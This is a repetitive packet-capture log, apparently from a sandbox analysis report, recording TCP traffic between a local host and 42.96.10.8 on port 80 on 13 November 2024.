                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271899939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271915913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271928072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271945953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271958113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271961927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271980047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271992922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271998882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272017002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272036076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272051096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272059917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272082090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272139072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272155046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272171021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272176027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272214890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272268057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272281885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272298098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272313118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272329092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272329092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272351027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272515059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272530079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272567034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272595882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272624969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272633076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272650957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272667885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272682905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272691011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272715092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272717953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272747040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272763014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272764921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272780895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272795916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272810936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272816896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272835970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272875071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272891998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272907972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272918940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272924900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272943020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272948027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272970915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272986889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.272989988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.273004055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.273031950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.273046970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.273061037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.273070097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.273073912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.273113012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323050022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323074102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323091030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323106050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323121071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323137999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323156118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323163986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323174953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323193073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323201895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323218107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323234081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323249102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323260069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323266983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323282957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323295116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323302984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323311090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323344946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323359013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323364973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323376894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323393106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323400974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323410988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.323427916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.354640007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.354662895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.354680061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.354686975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.354696989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.354715109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.354716063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.355236053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364061117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364078045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364094019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364120007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364561081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364576101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364604950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364613056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364620924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364636898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364639044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364666939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364680052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364706993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.364732027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383740902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383765936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383783102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383816004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383873940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383889914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383905888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383920908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383930922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383939028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383955956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383958101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383975029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.383996964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.384001970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.384016037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.384016991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.384033918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.384057999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.384948969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.384974957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.384990931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.384995937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385006905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385034084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385049105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385062933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385065079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385077953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385081053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385102987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385106087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385121107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385135889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385142088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385152102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385168076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385183096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385190010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385209084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385211945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385225058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385246038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385256052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385260105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385277033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385287046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385292053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385308027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385313034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385324955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385351896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385406017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385421038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385436058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385449886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385459900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385464907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385483980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385490894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385499001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385508060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385523081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385545969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385550976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385566950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385582924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385591030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385600090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385622978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385715008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385731936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385746956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385757923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385763884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385781050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385786057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385797024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385814905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385823011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385838985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385857105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385870934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385873079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385890007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385900974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385912895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385930061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385931969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.385989904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386003971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386018991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386019945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386039972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386173964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386189938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386205912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386219978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386228085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386244059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386245966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386262894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386277914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386291981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386297941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386322021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386323929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386336088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386364937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386370897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386382103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386403084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386408091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386424065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386439085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386456966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386460066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386475086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386487961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386507988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386518002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386533022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386548042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386569977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386574984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386589050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386604071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386611938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386620045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386637926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386899948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386991978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.386992931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387010098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387034893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387049913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387051105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387075901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387089968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387101889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387108088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387125015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387126923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387166977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387212992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387228012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387243032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387258053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387268066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387274027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387290955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387296915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387306929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387329102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387336969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387352943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387367964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387392044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387412071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387439013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387520075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387536049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387558937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387603998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387619972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387635946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387653112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387658119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387679100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387716055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387732983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387748003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387763023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387768030 CET4973380192.168.2.442.96.10.8
